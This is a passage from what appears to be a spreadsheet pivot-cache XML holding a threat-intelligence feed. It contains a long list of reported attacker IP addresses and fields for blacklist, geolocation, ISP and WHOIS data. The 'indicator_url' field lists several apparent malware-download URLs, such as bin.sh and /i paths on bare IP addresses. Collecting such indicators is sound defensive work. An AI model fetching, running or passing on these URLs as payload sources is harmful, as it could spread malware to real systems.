        <s v="203.112.154.122"/>
        <s v="103.175.168.32"/>
        <s v="221.166.211.89"/>
        <s v="175.203.56.157"/>
        <s v="114.35.174.250"/>
        <s v="116.103.215.117"/>
        <s v="121.168.221.154"/>
        <s v="116.108.99.179"/>
        <s v="182.56.229.4"/>
        <s v="117.195.208.97"/>
        <s v="75.44.21.179"/>
        <s v="185.16.38.166"/>
        <s v="117.212.43.172"/>
        <s v="79.116.36.42"/>
        <s v="41.59.146.74"/>
        <s v="117.2.200.61"/>
        <s v="37.229.245.160"/>
        <s v="220.135.110.129"/>
        <s v="114.34.101.210"/>
        <s v="49.213.128.14"/>
        <s v="218.164.203.126"/>
        <s v="60.246.137.175"/>
        <s v="115.247.64.254"/>
        <s v="220.133.16.169"/>
        <s v="220.135.166.99"/>
        <s v="59.126.23.220"/>
        <s v="59.126.185.198"/>
        <s v="220.134.133.190"/>
        <s v="125.229.164.158"/>
        <s v="1.34.235.81"/>
        <s v="125.229.120.41"/>
        <s v="49.37.162.31"/>
        <s v="217.11.165.105"/>
        <s v="103.100.178.225"/>
        <s v="133.175.255.231"/>
        <s v="220.134.133.35"/>
        <s v="82.20.10.221"/>
        <s v="49.213.231.93"/>
        <s v="61.220.216.233"/>
        <s v="189.216.40.171"/>
        <s v="49.213.185.228"/>
        <s v="76.125.131.104"/>
        <s v="119.198.52.17"/>
        <s v="117.203.231.137"/>
        <s v="138.75.34.66"/>
        <s v="117.241.184.207"/>
        <s v="117.233.153.85"/>
        <s v="113.190.233.19"/>
        <s v="59.180.133.122"/>
        <s v="175.141.193.174"/>
        <s v="1.34.92.38"/>
        <s v="138.75.59.79"/>
        <s v="117.216.19.175"/>
        <s v="125.99.208.245"/>
        <s v="41.60.144.196"/>
        <s v="65.130.44.45"/>
        <s v="111.242.222.54"/>
        <s v="59.115.204.16"/>
        <s v="61.3.30.142"/>
        <s v="114.26.93.48"/>
        <s v="117.254.34.154"/>
        <s v="60.246.82.129"/>
        <s v="117.192.136.155"/>
        <s v="117.241.191.28"/>
        <s v="59.95.133.240"/>
        <s v="61.1.128.230"/>
        <s v="117.194.145.84"/>
        <s v="117.195.37.147"/>
        <s v="119.236.236.6"/>
        <s v="49.130.177.213"/>
        <s v="123.231.190.210"/>
        <s v="213.209.150.150"/>
        <s v="207.135.229.4"/>
        <s v="114.35.151.95"/>
        <s v="182.60.47.238"/>
        <s v="220.135.2.149"/>
        <s v="117.2.210.155"/>
        <s v="46.121.76.83"/>
        <s v="59.93.137.207"/>
        <s v="41.175.201.25"/>
        <s v="146.70.132.204"/>
        <s v="77.3.134.2"/>
        <s v="117.197.130.4"/>
        <s v="117.207.6.213"/>
        <s v="61.3.1.31"/>
        <s v="167.60.10.224"/>
        <s v="120.61.243.224"/>
        <s v="5.178.236.121"/>
        <s v="120.61.82.192"/>
        <s v="178.239.151.69"/>
        <s v="31.190.161.185"/>
        <s v="211.195.217.20"/>
        <s v="122.117.31.176"/>
        <s v="125.24.199.32"/>
        <s v="217.35.71.255"/>
        <s v="49.213.131.78"/>
        <s v="117.203.139.86"/>
        <s v="168.0.147.143"/>
        <s v="222.103.95.195"/>
        <s v="59.98.196.167"/>
        <s v="117.208.229.120"/>
        <s v="117.202.139.176"/>
        <s v="89.177.131.240"/>
        <s v="125.231.231.17"/>
        <s v="119.47.88.2"/>
        <s v="125.228.129.114"/>
        <s v="5.58.13.208"/>
        <s v="58.82.223.180"/>
        <s v="59.89.191.3"/>
        <s v="54.36.148.231"/>
        <s v="202.140.131.13"/>
        <s v="117.204.21.169"/>
        <s v="220.255.250.215"/>
        <s v="103.138.1.43"/>
        <s v="125.228.31.29"/>
        <s v="117.219.70.76"/>
        <s v="117.217.93.130"/>
        <s v="117.208.213.8"/>
        <s v="103.80.116.107"/>
        <s v="147.185.133.69"/>
        <s v="14.237.224.45"/>
        <s v="171.96.203.165"/>
        <s v="181.102.104.164"/>
        <s v="37.243.248.237"/>
        <s v="120.61.254.59"/>
        <s v="110.159.151.215"/>
        <s v="98.45.14.131"/>
        <s v="59.93.124.115"/>
        <s v="117.255.176.120"/>
        <s v="81.149.118.126"/>
        <s v="117.243.194.34"/>
        <s v="59.93.111.58"/>
        <s v="27.147.219.58"/>
        <s v="1.172.6.127"/>
        <s v="122.169.253.144"/>
        <s v="45.164.176.252"/>
        <s v="117.192.131.42"/>
        <s v="220.137.214.100"/>
        <s v="61.1.63.94"/>
        <s v="61.2.94.121"/>
        <s v="117.207.41.68"/>
        <s v="120.61.93.223"/>
        <s v="59.93.141.68"/>
        <s v="125.228.115.91"/>
        <s v="117.219.164.110"/>
        <s v="117.195.215.244"/>
        <s v="182.78.46.78"/>
        <s v="37.36.87.37"/>
        <s v="182.57.212.167"/>
        <s v="125.137.90.45"/>
        <s v="59.93.139.158"/>
        <s v="49.43.233.124"/>
        <s v="125.229.240.71"/>
        <s v="43.225.189.185"/>
        <s v="101.181.59.237"/>
        <s v="125.235.235.110"/>
        <s v="61.3.55.231"/>
        <s v="175.137.162.135"/>
        <s v="122.117.94.206"/>
        <s v="220.134.4.19"/>
        <s v="220.133.28.97"/>
        <s v="189.237.215.18"/>
        <s v="202.168.87.137"/>
        <s v="59.126.41.64"/>
        <s v="203.115.96.195"/>
        <s v="157.66.147.95"/>
        <s v="46.118.62.156"/>
        <s v="160.176.26.198"/>
        <s v="61.2.56.216"/>
        <s v="49.213.234.141"/>
        <s v="59.126.129.45"/>
        <s v="138.199.21.231"/>
        <s v="146.196.45.195"/>
        <s v="118.167.156.88"/>
        <s v="59.126.63.48"/>
        <s v="49.213.188.133"/>
        <s v="125.228.29.90"/>
        <s v="220.135.130.178"/>
        <s v="59.126.62.141"/>
        <s v="59.126.39.217"/>
        <s v="59.126.254.199"/>
        <s v="117.214.4.180"/>
        <s v="114.34.192.249"/>
        <s v="117.245.202.252"/>
        <s v="27.255.132.5"/>
        <s v="59.126.254.42"/>
        <s v="59.92.177.210"/>
        <s v="117.207.49.249"/>
        <s v="220.132.62.167"/>
        <s v="125.228.32.47"/>
        <s v="59.126.119.22"/>
        <s v="106.215.159.10"/>
        <s v="114.33.38.40"/>
        <s v="182.56.33.169"/>
        <s v="125.228.28.243"/>
        <s v="45.233.77.49"/>
        <s v="117.207.161.23"/>
        <s v="37.252.79.24"/>
        <s v="220.133.175.72"/>
        <s v="103.10.71.51"/>
        <s v="123.205.121.86"/>
        <s v="114.33.143.114"/>
        <s v="117.242.233.113"/>
        <s v="122.117.104.99"/>
        <s v="59.127.42.239"/>
        <s v="220.133.177.156"/>
        <s v="59.126.194.111"/>
        <s v="121.7.118.22"/>
        <s v="125.229.44.63"/>
        <s v="117.205.152.186"/>
        <s v="49.213.226.204"/>
        <s v="114.35.9.14"/>
        <s v="59.93.124.241"/>
        <s v="129.126.207.65"/>
        <s v="122.117.58.73"/>
        <s v="59.183.24.99"/>
        <s v="113.61.206.38"/>
        <s v="125.229.18.252"/>
        <s v="1.170.66.3"/>
        <s v="196.251.72.115"/>
        <s v="151.45.98.166"/>
        <s v="116.241.67.122"/>
        <s v="122.117.41.146"/>
        <s v="114.33.46.68"/>
        <s v="59.183.151.190"/>
        <s v="125.228.37.189"/>
        <s v="61.2.165.33"/>
        <s v="122.117.122.47"/>
        <s v="46.118.74.238"/>
        <s v="117.219.70.49"/>
        <s v="125.228.195.225"/>
        <s v="59.126.83.83"/>
        <s v="195.32.4.109"/>
        <s v="220.135.10.143"/>
        <s v="59.182.24.25"/>
        <s v="49.244.149.168"/>
        <s v="122.117.239.244"/>
        <s v="122.117.234.12"/>
        <s v="59.98.236.209"/>
        <s v="117.209.93.157"/>
        <s v="59.126.85.114"/>
        <s v="175.106.37.179"/>
        <s v="125.228.160.16"/>
        <s v="125.228.64.4"/>
        <s v="81.182.248.107"/>
        <s v="182.59.201.61"/>
        <s v="202.17.141.202"/>
        <s v="114.33.108.101"/>
        <s v="117.235.60.71"/>
        <s v="220.132.187.195"/>
        <s v="14.176.231.1"/>
        <s v="220.134.74.45"/>
        <s v="117.253.212.110"/>
        <s v="129.126.213.221"/>
        <s v="42.60.108.30"/>
        <s v="59.127.142.62"/>
        <s v="220.132.127.176"/>
        <s v="117.208.221.74"/>
        <s v="117.204.149.22"/>
        <s v="173.2.135.126"/>
        <s v="117.235.101.143"/>
        <s v="117.206.31.79"/>
        <s v="125.229.224.226"/>
        <s v="59.126.136.131"/>
        <s v="114.33.254.88"/>
        <s v="36.235.117.177"/>
        <s v="114.35.102.128"/>
        <s v="122.168.126.219"/>
        <s v="114.35.42.193"/>
        <s v="101.109.169.247"/>
        <s v="114.35.57.211"/>
        <s v="59.183.133.98"/>
        <s v="220.135.138.99"/>
        <s v="59.126.188.50"/>
        <s v="117.235.6.167"/>
        <s v="59.91.41.1"/>
        <s v="98.26.114.134"/>
        <s v="122.117.63.117"/>
        <s v="203.217.125.131"/>
        <s v="177.106.226.211"/>
        <s v="117.251.165.187"/>
        <s v="114.33.29.149"/>
        <s v="103.127.31.138"/>
        <s v="173.49.75.75"/>
        <s v="45.164.177.188"/>
        <s v="176.35.142.195"/>
        <s v="59.183.150.159"/>
        <s v="117.242.227.115"/>
        <s v="220.133.146.225"/>
        <s v="220.132.54.11"/>
        <s v="1.34.43.114"/>
        <s v="59.126.168.111"/>
        <s v="118.40.114.71"/>
        <s v="125.228.104.109"/>
        <s v="220.135.152.48"/>
        <s v="114.35.175.90"/>
        <s v="122.117.92.251"/>
        <s v="114.33.112.54"/>
        <s v="122.116.254.191"/>
        <s v="220.135.10.241"/>
        <s v="117.207.172.73"/>
        <s v="125.228.163.111"/>
        <s v="187.110.138.130"/>
        <s v="103.244.107.81"/>
        <s v="49.213.203.50"/>
        <s v="27.96.240.204"/>
        <s v="117.206.22.211"/>
        <s v="202.83.16.105"/>
        <s v="114.33.1.240"/>
        <s v="115.246.100.3"/>
        <s v="117.209.84.219"/>
        <s v="114.32.184.112"/>
        <s v="220.132.174.9"/>
        <s v="125.228.158.220"/>
        <s v="59.127.196.176"/>
        <s v="59.126.139.160"/>
        <s v="117.242.102.234"/>
        <s v="59.98.30.101"/>
        <s v="122.117.98.41"/>
        <s v="103.149.121.25"/>
        <s v="117.216.17.48"/>
        <s v="117.205.159.207"/>
        <s v="220.133.134.107"/>
        <s v="13.216.241.88"/>
        <s v="103.97.96.30"/>
        <s v="49.213.234.221"/>
        <s v="59.127.140.23"/>
        <s v="49.37.128.194"/>
        <s v="125.228.47.45"/>
        <s v="125.26.173.230"/>
        <s v="192.145.127.210"/>
        <s v="220.133.147.229"/>
        <s v="45.71.120.164"/>
        <s v="114.35.79.85"/>
        <s v="125.228.185.64"/>
        <s v="120.56.93.56"/>
        <s v="176.91.167.74"/>
        <s v="82.51.54.187"/>
        <s v="220.133.60.228"/>
        <s v="120.61.162.198"/>
        <s v="103.21.55.186"/>
        <s v="185.198.186.21"/>
        <s v="117.205.145.63"/>
        <s v="118.163.142.112"/>
        <s v="185.74.222.175"/>
        <s v="59.95.207.133"/>
        <s v="27.5.208.235"/>
        <s v="115.96.111.101"/>
        <s v="117.217.218.220"/>
        <s v="117.195.213.157"/>
        <s v="59.178.252.152"/>
        <s v="123.195.177.68"/>
        <s v="59.182.148.194"/>
        <s v="117.208.250.0"/>
        <s v="220.134.237.107"/>
        <s v="59.127.235.231"/>
        <s v="114.33.77.154"/>
        <s v="114.35.175.31"/>
        <s v="114.33.29.101"/>
        <s v="160.178.101.99"/>
        <s v="220.135.89.91"/>
        <s v="125.229.195.249"/>
        <s v="220.134.21.67"/>
        <s v="125.229.4.85"/>
        <s v="110.227.156.68"/>
        <s v="218.161.83.188"/>
        <s v="59.126.180.239"/>
        <s v="218.161.74.229"/>
        <s v="114.32.126.61"/>
        <s v="103.106.195.113"/>
        <s v="81.167.10.205"/>
        <s v="103.30.65.45"/>
        <s v="117.194.242.255"/>
        <s v="117.204.20.87"/>
        <s v="114.35.174.39"/>
        <s v="220.132.194.158"/>
        <s v="117.206.130.113"/>
        <s v="117.206.60.103"/>
        <s v="27.255.225.187"/>
        <s v="152.59.170.119"/>
        <s v="103.67.49.84"/>
        <s v="122.117.124.137"/>
        <s v="59.180.189.121"/>
        <s v="220.135.101.92"/>
        <s v="117.209.78.100"/>
        <s v="220.135.83.34"/>
        <s v="122.116.21.91"/>
        <s v="14.195.143.52"/>
        <s v="59.126.47.168"/>
        <s v="117.242.102.160"/>
        <s v="117.206.181.240"/>
        <s v="61.3.72.19"/>
        <s v="117.213.48.227"/>
        <s v="59.126.87.86"/>
        <s v="202.140.131.11"/>
        <s v="117.199.219.85"/>
        <s v="134.249.202.156"/>
        <s v="220.133.66.155"/>
        <s v="117.243.144.120"/>
        <s v="117.209.202.151"/>
        <s v="125.229.146.44"/>
        <s v="103.160.216.33"/>
        <s v="210.89.61.34"/>
        <s v="117.206.1.236"/>
        <s v="14.247.104.15"/>
        <s v="220.135.152.21"/>
        <s v="170.62.100.181"/>
        <s v="220.134.169.142"/>
        <s v="122.165.219.9"/>
        <s v="106.107.212.214"/>
        <s v="175.183.32.151"/>
        <s v="59.88.153.164"/>
        <s v="103.152.7.97"/>
        <s v="117.214.105.36"/>
        <s v="59.126.217.65"/>
        <s v="1.34.65.133"/>
        <s v="220.135.199.221"/>
        <s v="1.33.85.228"/>
        <s v="125.229.88.249"/>
        <s v="103.149.59.4"/>
        <s v="1.34.146.59"/>
        <s v="114.35.101.113"/>
        <s v="59.126.101.241"/>
        <s v="146.90.6.169"/>
        <s v="113.22.239.16"/>
        <s v="1.34.2.141"/>
        <s v="125.228.37.39"/>
        <s v="182.60.35.7"/>
        <s v="117.201.178.70"/>
        <s v="61.3.114.242"/>
        <s v="114.33.61.109"/>
        <s v="59.91.34.195"/>
        <s v="220.132.171.103"/>
        <s v="59.126.32.90"/>
        <s v="125.228.29.65"/>
        <s v="122.117.18.160"/>
        <s v="46.237.70.115"/>
        <s v="125.229.241.172"/>
        <s v="125.228.180.175"/>
        <s v="59.91.233.198"/>
        <s v="125.229.239.144"/>
        <s v="177.223.39.134"/>
        <s v="157.42.193.253"/>
        <s v="188.163.94.34"/>
        <s v="220.133.185.18"/>
        <s v="114.32.64.98"/>
        <s v="114.32.198.204"/>
        <s v="117.207.169.234"/>
        <s v="117.192.131.113"/>
        <s v="117.196.146.36"/>
        <s v="220.134.100.207"/>
        <s v="125.229.164.48"/>
        <s v="61.221.225.247"/>
        <s v="117.212.216.185"/>
        <s v="117.243.123.149"/>
        <s v="14.139.237.102"/>
        <s v="182.56.253.45"/>
        <s v="91.231.202.181"/>
        <s v="60.49.219.77"/>
        <s v="125.27.7.29"/>
        <s v="188.56.42.98"/>
        <s v="14.183.12.3"/>
        <s v="117.219.174.163"/>
        <s v="121.160.177.106"/>
        <s v="103.85.133.83"/>
        <s v="190.154.48.146"/>
        <s v="117.207.185.247"/>
        <s v="59.183.159.175"/>
        <s v="117.194.149.122"/>
        <s v="125.138.220.176"/>
        <s v="59.183.125.28"/>
        <s v="59.182.250.185"/>
        <s v="120.61.33.193"/>
        <s v="59.180.160.21"/>
        <s v="220.135.64.179"/>
        <s v="125.229.248.189"/>
        <s v="59.126.128.101"/>
        <s v="59.127.112.121"/>
        <s v="1.34.200.86"/>
        <s v="117.254.177.72"/>
        <s v="122.117.59.154"/>
        <s v="220.134.58.103"/>
        <s v="59.126.61.136"/>
        <s v="115.245.110.46"/>
        <s v="71.25.225.131"/>
        <s v="59.93.121.117"/>
        <s v="122.117.18.135"/>
        <s v="125.229.31.216"/>
        <s v="59.126.78.147"/>
        <s v="117.245.195.198"/>
        <s v="195.162.82.141"/>
        <s v="1.34.254.21"/>
        <s v="153.177.124.160"/>
        <s v="114.33.81.189"/>
        <s v="189.173.111.110"/>
        <s v="59.184.253.150"/>
        <s v="117.214.195.155"/>
        <s v="117.206.196.152"/>
        <s v="103.24.148.43"/>
        <s v="117.235.214.199"/>
        <s v="101.108.60.55"/>
        <s v="59.126.129.172"/>
        <s v="114.34.30.130"/>
        <s v="223.184.0.95"/>
        <s v="122.116.158.160"/>
        <s v="49.213.182.149"/>
        <s v="182.57.239.62"/>
        <s v="59.126.151.165"/>
        <s v="117.206.139.148"/>
        <s v="220.132.157.172"/>
        <s v="61.0.87.15"/>
        <s v="220.134.57.61"/>
        <s v="125.229.89.163"/>
        <s v="117.208.227.164"/>
        <s v="117.251.53.64"/>
        <s v="218.161.30.145"/>
        <s v="125.228.61.250"/>
        <s v="125.228.180.10"/>
        <s v="59.125.60.224"/>
        <s v="220.135.149.27"/>
        <s v="85.51.255.147"/>
        <s v="220.133.67.138"/>
        <s v="220.133.40.168"/>
        <s v="60.248.68.185"/>
        <s v="220.133.82.141"/>
        <s v="121.121.163.81"/>
        <s v="59.126.81.234"/>
        <s v="117.203.130.219"/>
        <s v="125.229.138.168"/>
        <s v="114.33.209.132"/>
        <s v="61.3.55.215"/>
        <s v="220.132.126.94"/>
        <s v="117.255.47.40"/>
        <s v="27.59.21.114"/>
        <s v="220.132.157.191"/>
        <s v="146.190.173.178"/>
        <s v="59.93.123.136"/>
        <s v="220.133.203.74"/>
        <s v="103.171.201.234"/>
        <s v="122.116.113.188"/>
        <s v="123.18.140.119"/>
        <s v="59.97.245.126"/>
        <s v="117.242.234.122"/>
        <s v="121.183.75.18"/>
        <s v="122.117.36.249"/>
        <s v="115.97.117.53"/>
        <s v="218.161.88.19"/>
        <s v="117.203.209.67"/>
        <s v="114.34.18.147"/>
        <s v="117.193.49.171"/>
        <s v="220.134.19.210"/>
        <s v="59.182.113.138"/>
        <s v="114.33.108.83"/>
        <s v="220.132.17.202"/>
        <s v="125.229.14.67"/>
        <s v="120.61.94.115"/>
        <s v="152.59.221.77"/>
        <s v="117.209.87.171"/>
        <s v="59.126.217.3"/>
        <s v="122.117.38.20"/>
        <s v="125.229.237.151"/>
        <s v="220.134.253.147"/>
        <s v="125.229.210.141"/>
        <s v="220.133.67.211"/>
        <s v="59.126.114.190"/>
        <s v="118.170.200.52"/>
        <s v="117.219.76.108"/>
        <s v="125.228.157.93"/>
        <s v="114.33.143.13"/>
        <s v="125.228.89.19"/>
        <s v="133.204.55.91"/>
        <s v="82.48.173.156"/>
        <s v="117.251.115.99"/>
        <s v="23.95.186.186"/>
        <s v="117.247.87.21"/>
        <s v="220.134.124.198"/>
        <s v="120.60.189.31"/>
        <s v="59.96.109.16"/>
        <s v="220.132.86.71"/>
        <s v="122.117.93.26"/>
        <s v="220.134.135.153"/>
        <s v="114.34.85.73"/>
        <s v="114.34.110.57"/>
        <s v="220.133.82.198"/>
        <s v="220.135.126.118"/>
        <s v="125.228.50.215"/>
        <s v="114.33.80.80"/>
        <s v="220.133.196.95"/>
        <s v="125.228.34.140"/>
        <s v="117.203.233.118"/>
        <s v="220.133.134.26"/>
        <s v="114.33.88.168"/>
        <s v="134.236.160.158"/>
        <s v="59.93.229.183"/>
        <s v="2.69.68.47"/>
        <s v="125.229.52.69"/>
        <s v="112.173.65.8"/>
        <s v="59.127.42.230"/>
        <s v="176.98.200.30"/>
        <s v="114.33.17.89"/>
        <s v="122.116.127.90"/>
        <s v="104.193.135.102"/>
        <s v="182.60.230.212"/>
        <s v="220.134.29.32"/>
        <s v="115.245.94.46"/>
        <s v="114.33.107.229"/>
        <s v="182.56.173.108"/>
        <s v="94.183.4.165"/>
        <s v="114.33.69.141"/>
        <s v="122.162.144.80"/>
        <s v="220.132.127.146"/>
        <s v="37.115.183.6"/>
        <s v="152.89.160.98"/>
        <s v="117.253.166.77"/>
        <s v="220.133.139.17"/>
        <s v="220.133.171.22"/>
        <s v="125.229.225.159"/>
        <s v="114.34.141.233"/>
        <s v="1.34.126.178"/>
        <s v="117.209.145.72"/>
        <s v="182.152.10.37"/>
        <s v="120.60.38.68"/>
        <s v="220.133.83.143"/>
        <s v="117.198.100.50"/>
        <s v="115.127.81.122"/>
        <s v="114.34.92.17"/>
        <s v="103.47.14.40"/>
        <s v="117.193.244.211"/>
        <s v="117.248.170.161"/>
        <s v="103.42.75.85"/>
        <s v="125.99.1.240"/>
        <s v="27.54.178.152"/>
        <s v="117.241.84.57"/>
        <s v="162.216.111.48"/>
        <s v="125.20.125.182"/>
        <s v="218.161.80.219"/>
        <s v="59.127.84.223"/>
        <s v="117.216.31.117"/>
        <s v="61.1.136.198"/>
        <s v="202.164.39.5"/>
        <s v="220.133.208.116"/>
        <s v="114.33.34.150"/>
        <s v="37.36.79.141"/>
        <s v="125.229.190.215"/>
        <s v="59.127.235.145"/>
        <s v="59.126.80.9"/>
        <s v="220.134.152.134"/>
        <s v="59.127.129.13"/>
        <s v="177.229.67.231"/>
        <s v="117.254.27.3"/>
        <s v="14.249.114.43"/>
        <s v="101.108.147.183"/>
        <s v="49.36.81.187"/>
        <s v="196.251.118.151"/>
        <s v="27.64.194.18"/>
        <s v="125.228.163.67"/>
        <s v="89.10.251.30"/>
        <s v="219.100.164.205"/>
        <s v="5.202.109.248"/>
        <s v="125.229.4.249"/>
        <s v="125.228.119.130"/>
        <s v="122.117.4.165"/>
        <s v="114.35.114.164"/>
        <s v="114.34.244.28"/>
        <s v="59.126.229.170"/>
        <s v="117.207.160.222"/>
        <s v="59.92.185.181"/>
        <s v="220.132.6.48"/>
        <s v="125.229.252.183"/>
        <s v="122.117.135.153"/>
        <s v="116.103.77.110"/>
        <s v="59.126.35.101"/>
        <s v="117.235.230.200"/>
        <s v="117.208.92.155"/>
        <s v="220.132.149.61"/>
        <s v="59.183.172.46"/>
        <s v="218.161.97.71"/>
        <s v="222.116.180.50"/>
        <s v="59.126.176.150"/>
        <s v="138.199.34.145"/>
        <s v="1.34.58.99"/>
        <s v="114.33.107.149"/>
        <s v="114.35.199.237"/>
        <s v="187.53.184.108"/>
        <s v="114.33.107.213"/>
        <s v="59.127.155.16"/>
        <s v="59.178.11.131"/>
        <s v="59.126.68.151"/>
        <s v="59.126.160.80"/>
        <s v="59.178.155.132"/>
        <s v="59.178.2.204"/>
        <s v="218.161.78.231"/>
        <s v="59.126.72.231"/>
        <s v="122.116.142.53"/>
        <s v="117.241.210.6"/>
        <s v="179.25.82.45"/>
        <s v="117.199.14.214"/>
        <s v="218.161.28.27"/>
        <s v="114.32.231.45"/>
        <s v="49.213.135.117"/>
        <s v="65.23.183.10"/>
        <s v="59.127.5.6"/>
        <s v="125.228.91.149"/>
        <s v="106.105.93.248"/>
        <s v="117.199.84.115"/>
        <s v="125.229.136.194"/>
        <s v="36.37.221.213"/>
        <s v="59.126.252.210"/>
        <s v="117.204.164.234"/>
        <s v="186.208.6.111"/>
        <s v="45.134.79.119"/>
        <s v="117.243.254.51"/>
        <s v="218.161.62.168"/>
        <s v="117.202.139.220"/>
        <s v="218.161.88.124"/>
        <s v="59.92.191.113"/>
        <s v="117.2.177.118"/>
      </sharedItems>
    </cacheField>
    <cacheField name="indicator_domain" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="indicator_url" numFmtId="0">
      <sharedItems count="10">
        <s v="NA"/>
        <s v="http://104.193.59.142:37653/bin.sh"/>
        <s v="http://196.188.80.240:50753/i"/>
        <s v="http://112.198.200.191:60597/i"/>
        <s v="http://37.148.13.85:50843/.i"/>
        <s v="http://200.6.91.45:55764/i"/>
        <s v="http://47.76.211.88:60131/linux"/>
        <s v="http://222.127.237.115:52061/bin.sh"/>
        <s v="http://117.209.92.117:52750/bin.sh"/>
        <s v="http://196.189.39.163:51858/i"/>
      </sharedItems>
    </cacheField>
    <cacheField name="reported_at" numFmtId="164">
      <sharedItems containsSemiMixedTypes="0" containsNonDate="0" containsDate="1" containsString="0" minDate="2025-04-01T00:02:40" maxDate="2025-04-30T23:59:42"/>
    </cacheField>
    <cacheField name="first_at" numFmtId="164">
      <sharedItems containsSemiMixedTypes="0" containsNonDate="0" containsDate="1" containsString="0" minDate="2023-07-24T15:21:29" maxDate="2025-04-30T23:57:58"/>
    </cacheField>
    <cacheField name="last_at" numFmtId="164">
      <sharedItems containsSemiMixedTypes="0" containsNonDate="0" containsDate="1" containsString="0" minDate="2025-04-01T00:02:40" maxDate="2025-04-30T23:59:42"/>
    </cacheField>
    <cacheField name="count" numFmtId="0">
      <sharedItems containsSemiMixedTypes="0" containsString="0" containsNumber="1" containsInteger="1" minValue="1" maxValue="624460"/>
    </cacheField>
    <cacheField name="tags" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="sources" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="confidence" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="provider" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="Attacked_Port" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="IP_blacklist" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="IP_blacklist_name" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="IP_blacklist_count" numFmtId="0">
      <sharedItems containsSemiMixedTypes="0" containsString="0" containsNumber="1" containsInteger="1" minValue="0" maxValue="193"/>
    </cacheField>
    <cacheField name="isCrawler" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="isProxy" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="ProxyType" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="threatLevel" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="threatDetails" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="continentCode" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="continentName" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="countryCode" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="countryName" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="stateProvCode" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="stateProv" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="district" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="city" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="geonameId" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="zipCode" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="latitude" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="longitude" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="asNumber" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="asName" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="isp" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="usageTypeconsumer" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="organization" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="IP_Created_date" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="IP_Name" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="IP_Updated_date" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="action" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Brief_Info_data" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="method" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="command" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="argument" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="content" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="sender" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Creation_Date" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Exp_Date" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Last_Update_date" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Name_Server" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Registrar" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Status" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="Domain_Registrant_Name" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Domain_Registrant_Email" numFmtId="0">
      <sharedItems count="40">
        <s v="NA"/>
        <s v="None"/>
        <s v="['foreign@net-chinese.com.tw', 'vnsadm@hinet.net']"/>
        <s v="['abuse@namecheap.com', 'ab6ac7601ddc48dc97771b2b2ae2638f.protect@withheldforprivacy.com']"/>
        <s v="['abuse@gmo.jp', 'proxy@whoisprotectservice.com']"/>
        <s v="['abusecomplaints@markmonitor.com', 'domain.registration@telus.com', 'ccopsbilling@markmonitor.com']"/>
        <s v="abuse@namecheap.com"/>
        <s v="abusecomplaints@markmonitor.com"/>
        <s v="abuse@dynu.com"/>
        <s v="registrar-notices@cloudflare.com"/>
        <s v="['domainabuse@tucows.com', 'mdqpdflf@whoisprivacyprotect.com', 'ABUSE@ENOM.COM']"/>
        <s v="['abuse@namesrs.com', 'bredband2.com@shieldwhois.com']"/>
        <s v="['abusecomplaints@markmonitor.com', 'hostmaster@amazon.com', 'whoisrequest@markmonitor.com']"/>
        <s v="['domainabuse@cscglobal.com', 'hostmaster@comcast.com']"/>
        <s v="['foreign@net-chinese.com.tw', 'MIS3@markwell.com.tw', 'hostmaster@net-chinese.com.tw']"/>
        <s v="['abusecomplaints@markmonitor.com', 'whoisrequest@markmonitor.com']"/>
        <s v="['abuse@key-systems.net', 'abusereport@key-systems.net', 'info@domain-contact.org']"/>
        <s v="['abuse@registrygate.com', 'info@domain-contact.org']"/>
        <s v="abuse@ovh.net"/>
        <s v="['domainabuse@cscglobal.com', 'hostmaster@charter.com']"/>
